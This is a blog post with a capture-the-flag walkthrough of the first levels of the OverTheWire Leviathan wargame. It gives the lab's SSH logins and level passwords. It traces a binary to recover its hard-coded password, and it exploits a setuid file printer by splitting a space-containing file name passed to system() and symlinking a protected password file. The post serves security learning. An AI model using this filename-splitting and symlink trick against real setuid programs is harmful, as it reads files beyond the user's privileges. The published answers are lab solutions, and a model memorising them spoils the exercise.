<!doctype html><html lang=en><head><title>Leviathan walkthrough · HOME</title><meta charset=utf-8><meta name=viewport content="width=device-width,initial-scale=1"><meta name=color-scheme content="light dark"><meta http-equiv=content-security-policy content="upgrade-insecure-requests; block-all-mixed-content; default-src 'self'; child-src 'self'; font-src 'self' https://fonts.gstatic.com https://cdn.jsdelivr.net/; form-action 'self'; frame-src 'self'; img-src 'self'; object-src 'none'; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com/ https://cdn.jsdelivr.net/; script-src 'self' 'unsafe-inline' https://www.google-analytics.com https://cdn.jsdelivr.net/; prefetch-src 'self'; connect-src 'self' https://www.google-analytics.com;"><meta name=author content="Khaled Ngm"><meta name=description content="OverTheWire: Leviathan Walkthrough Link to heading We will discuss Leviathan game walkthrough ,This wargame doesn&rsquo;t require any knowledge about programming - just a bit of common sense and some knowledge about basic *nix commands .
ssh connection level0 level1 level2 level3 level4 level5 level6 level7 ssh connection ssh user@host -p port Link to heading first we have to establish ssh connection using ssh leviathan0@leviathan.labs.overthewire.org -p 2223 and password leviathan0 level0 Link to heading then let&rsquo;s use ls -la command to list files and directories."><meta name=keywords content="Red Team ,blog,pentester,penetration testesr,hacking"><meta name=twitter:card content="summary"><meta name=twitter:title content="Leviathan walkthrough"><meta name=twitter:description content="OverTheWire: Leviathan Walkthrough Link to heading We will discuss Leviathan game walkthrough ,This wargame doesn&rsquo;t require any knowledge about programming - just a bit of common sense and some knowledge about basic *nix commands .
ssh connection level0 level1 level2 level3 level4 level5 level6 level7 ssh connection ssh user@host -p port Link to heading first we have to establish ssh connection using ssh leviathan0@leviathan.labs.overthewire.org -p 2223 and password leviathan0 level0 Link to heading then let&rsquo;s use ls -la command to list files and directories."><meta property="og:title" content="Leviathan walkthrough"><meta property="og:description" content="OverTheWire: Leviathan Walkthrough Link to heading We will discuss Leviathan game walkthrough ,This wargame doesn&rsquo;t require any knowledge about programming - just a bit of common sense and some knowledge about basic *nix commands .
ssh connection level0 level1 level2 level3 level4 level5 level6 level7 ssh connection ssh user@host -p port Link to heading first we have to establish ssh connection using ssh leviathan0@leviathan.labs.overthewire.org -p 2223 and password leviathan0 level0 Link to heading then let&rsquo;s use ls -la command to list files and directories."><meta property="og:type" content="article"><meta property="og:url" content="https://khaledngm11.github.io/posts/leviathan/"><meta property="article:section" content="posts"><meta property="article:published_time" content="2022-07-04T00:00:00+00:00"><meta property="article:modified_time" content="2022-07-04T00:00:00+00:00"><link rel=canonical href=https://khaledngm11.github.io/posts/leviathan/><link rel=preload href="/fonts/forkawesome-webfont.woff2?v=1.2.0" as=font type=font/woff2 crossorigin><link rel=stylesheet href=/css/coder.min.c4d7e93a158eda5a65b3df343745d2092a0a1e2170feeec909b8a89443903c6a.css integrity="sha256-xNfpOhWO2lpls980N0XSCSoKHiFw/u7JCbiolEOQPGo=" crossorigin=anonymous media=screen><link rel=stylesheet href=/css/coder-dark.min.39e41a7f16bdf8cb16e43cae7d714fa1016f1d2d2898a5b3f27f42c9979204e2.css integrity="sha256-OeQafxa9+MsW5DyufXFPoQFvHS0omKWz8n9CyZeSBOI=" crossorigin=anonymous media=screen><link rel=icon type=image/png href=/images/favicon-32x32.png sizes=32x32><link rel=icon type=image/png href=/images/favicon-16x16.png sizes=16x16><link rel=apple-touch-icon href=/images/apple-touch-icon.png><link rel=apple-touch-icon sizes=180x180 href=/images/apple-touch-icon.png><link rel=manifest href=/site.webmanifest><link rel=mask-icon href=/images/safari-pinned-tab.svg color=#5bbad5><meta name=generator content="Hugo 0.104.2"></head><body class="preload-transitions colorscheme-auto"><div class=float-container><a id=dark-mode-toggle class=colorscheme-toggle><i class="fa fa-adjust fa-fw" aria-hidden=true></i></a></div><main class=wrapper><nav class=navigation><section class=container><a class=navigation-title href=/>HOME</a>
<input type=checkbox id=menu-toggle>
<label class="menu-button float-right" for=menu-toggle><i class="fa fa-bars fa-fw" aria-hidden=true></i></label><ul class=navigation-list><li class=navigation-item><a class=navigation-link href=/about/>About</a></li><li class=navigation-item><a class=navigation-link href=/posts/>Writeups</a></li><li class=navigation-item><a class=navigation-link href=/contact/>Contact me</a></li><li class="navigation-item menu-separator"><span>|</span></li><li class=navigation-item><a href=https://khaledngm11.github.io/pt-br/></a></li></ul></section></nav><div class=content><section class="container post"><article><header><div class=post-title><h1 class=title><a class=title-link href=https://khaledngm11.github.io/posts/leviathan/>Leviathan walkthrough</a></h1></div><div class=post-meta><div class=date><span class=posted-on><i class="fa fa-calendar" aria-hidden=true></i>
<time datetime=2022-07-04T00:00:00Z>July 4, 2022</time></span>
<span class=reading-time><i class="fa fa-clock-o" aria-hidden=true></i>
3-minute read</span></div></div></header><div><h1 id=overthewire-leviathan-walkthrough>OverTheWire: Leviathan Walkthrough
<a class=heading-link href=#overthewire-leviathan-walkthrough><i class="fa fa-link" aria-hidden=true title="Link to heading"></i>
<span class=sr-only>Link to heading</span></a></h1><p>We will discuss Leviathan game walkthrough ,This wargame doesn&rsquo;t require any knowledge about programming - just a bit of common
sense and some knowledge about basic *nix commands .</p><ul><li>ssh connection</li><li>level0</li><li>level1</li><li>level2</li><li>level3</li><li>level4</li><li>level5</li><li>level6</li><li>level7</li></ul><h2 id=ssh-connection-ssh-userhost--p-port>ssh connection <code>ssh user@host -p port</code>
<a class=heading-link href=#ssh-connection-ssh-userhost--p-port><i class="fa fa-link" aria-hidden=true title="Link to heading"></i>
<span class=sr-only>Link to heading</span></a></h2><ul><li>first we have to establish ssh connection using <code>ssh leviathan0@leviathan.labs.overthewire.org -p 2223</code> and password <code>leviathan0</code></li></ul><h2 id=level0>level0
<a class=heading-link href=#level0><i class="fa fa-link" aria-hidden=true title="Link to heading"></i>
<span class=sr-only>Link to heading</span></a></h2><ul><li>then let&rsquo;s use <code>ls -la</code> command to list files and directories.</li></ul><p><img src=/blog/images/131196663-0b273faf-2a2a-45a9-95d1-3474616d3c7a.png alt="List Directories"></p><ul><li><p>If we changed direcory to <code>.backup</code> directory we will find <code>bookmarks.html</code> text file .</p></li><li><p>Let&rsquo;s <code>grep</code> to get any interesting data about next level <code>leviathan1</code> .</p><p><code>cat bookmarks.html | grep leviathan1</code></p></li><li><p>So we got the password of the next level .</p></li></ul><h2 id=level1>level1
<a class=heading-link href=#level1><i class="fa fa-link" aria-hidden=true title="Link to heading"></i>
<span class=sr-only>Link to heading</span></a></h2><ul><li><p><code>ssh leviathan1@leviathan.labs.overthewire.org -p 2223</code> and password <code>rioGegei8m</code></p></li><li><p>we found elf executable file called <code>check</code>, let&rsquo;s execute it .</p><p><img src=/blog/images/131198175-3d06a1ce-52d1-4f57-9d17-dde7da578114.png alt="need pass"></p></li><li><p>As we see it needs a password , so let&rsquo;s use <code>ltrace ./check</code> command with a wrong password .</p><p><img src=/blog/images/131198440-93937c11-d39e-464e-b966-049d57452b74.png alt=compare></p></li><li><p>We realize that it compare the password with <code>sex</code> word , so we can enter password to reed leviathan2 pass from <code>/etc/leviathan_pass/leviathan2</code>.</p></li></ul><h2 id=level2>level2
<a class=heading-link href=#level2><i class="fa fa-link" aria-hidden=true title="Link to heading"></i>
<span class=sr-only>Link to heading</span></a></h2><ul><li><code>ssh leviathan2@leviathan.labs.overthewire.org -p 2223</code> and password <code>ougahZi8Ta</code></li><li>We found printfile , so let&rsquo;s create temp file to print it&rsquo;s content</li></ul><div class=highlight><pre tabindex=0 style=background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-fallback data-lang=fallback><span style=display:flex><span> leviathan2@leviathan:~$ mkdir /tmp/print
</span></span><span style=display:flex><span> leviathan2@leviathan:~$ echo hello &gt; /tmp/print/print.txt
</span></span></code></pre></div><ul><li>Next step we will use <code>ltrace ./printfile /tmp/print/print.txt</code> command .</li></ul><div class=highlight><pre tabindex=0 style=background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-fallback data-lang=fallback><span style=display:flex><span>__libc_start_main(0x804852b, 2, 0xffffd774, 0x8048610 &lt;unfinished ...&gt;
</span></span><span style=display:flex><span>access(&#34;/tmp/print/print.txt&#34;, 4)                                                                                 = 0
</span></span><span style=display:flex><span>snprintf(&#34;/bin/cat /tmp/print/print.txt&#34;, 511, &#34;/bin/cat %s&#34;, &#34;/tmp/print/print.txt&#34;)                             = 29
</span></span><span style=display:flex><span>geteuid()                                                                                                         = 12002
</span></span><span style=display:flex><span>geteuid()                                                                                                         = 12002
</span></span><span style=display:flex><span>setreuid(12002, 12002)                                                                                            = 0
</span></span><span style=display:flex><span>system(&#34;/bin/cat /tmp/print/print.txt&#34;hello
</span></span><span style=display:flex><span> &lt;no return ...&gt;
</span></span><span style=display:flex><span>--- SIGCHLD (Child exited) ---
</span></span><span style=display:flex><span>&lt;... system resumed&gt; )                                                                                            = 0
</span></span><span style=display:flex><span>+++ exited (status 0) +++
</span></span></code></pre></div><ul><li>We can see <code>access</code> function that call file path , we need to call leviathan3 file but we have no permission.</li><li>If we created a file with space snprintf will read it as two files .</li></ul><div class=highlight><pre tabindex=0 style=background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-fallback data-lang=fallback><span style=display:flex><span> __libc_start_main(0x804852b, 2, 0xffffd764, 0x8048610 &lt;unfinished ...&gt;
</span></span><span style=display:flex><span> access(&#34;/tmp/print/print hello.txt&#34;, 4)                                                                           = 0
</span></span><span style=display:flex><span> snprintf(&#34;/bin/cat /tmp/print/print hello.&#34;..., 511, &#34;/bin/cat %s&#34;, &#34;/tmp/print/print hello.txt&#34;)                 = 35
</span></span><span style=display:flex><span> geteuid()                                                                                                         = 12002
</span></span><span style=display:flex><span> geteuid()                                                                                                         = 12002
</span></span><span style=display:flex><span> setreuid(12002, 12002)                                                                                            = 0   
</span></span><span style=display:flex><span> system(&#34;/bin/cat /tmp/print/print hello.&#34;.../bin/cat: /tmp/print/print: No such file or directory
</span></span><span style=display:flex><span> /bin/cat: hello.txt: No such file or directory
</span></span><span style=display:flex><span> &lt;no return ...&gt;
</span></span><span style=display:flex><span> --- SIGCHLD (Child exited) ---
</span></span><span style=display:flex><span> &lt;... system resumed&gt; )                                                                                            = 256
</span></span><span style=display:flex><span> +++ exited (status 0) +++
</span></span></code></pre></div><ul><li>As we can see file name devided into two parts (print and hello.txt) , let&rsquo;s make a symbolic link to the first part .</li></ul><p><code>ln -s /etc/leviathan_pass/leviathan3 /tmp/print/print</code></p><ul><li>Finally we can read file and get password of next level .</li></ul><h2 id=level3>level3
<a class=heading-link href=#level3><i class="fa fa-link" aria-hidden=true title="Link to heading"></i>
<span class=sr-only>Link to heading</span></a></h2><ul><li><code>ssh leviathan3@leviathan.labs.overthewire.org -p 2223</code> and password <code>Ahdiemoo1j</code></li></ul></div><footer></footer></article></section></div><footer class=footer><section class=container>©
2022
Khaled Ngm
·
Powered by <a href=https://gohugo.io/>Hugo</a> & <a href=https://github.com/luizdepra/hugo-coder/>Coder</a>.</section></footer></main><script src=/js/coder.min.236049395dc3682fb2719640872958e12f1f24067bb09c327b233e6290c7edac.js integrity="sha256-I2BJOV3DaC+ycZZAhylY4S8fJAZ7sJwyeyM+YpDH7aw="></script></body></html>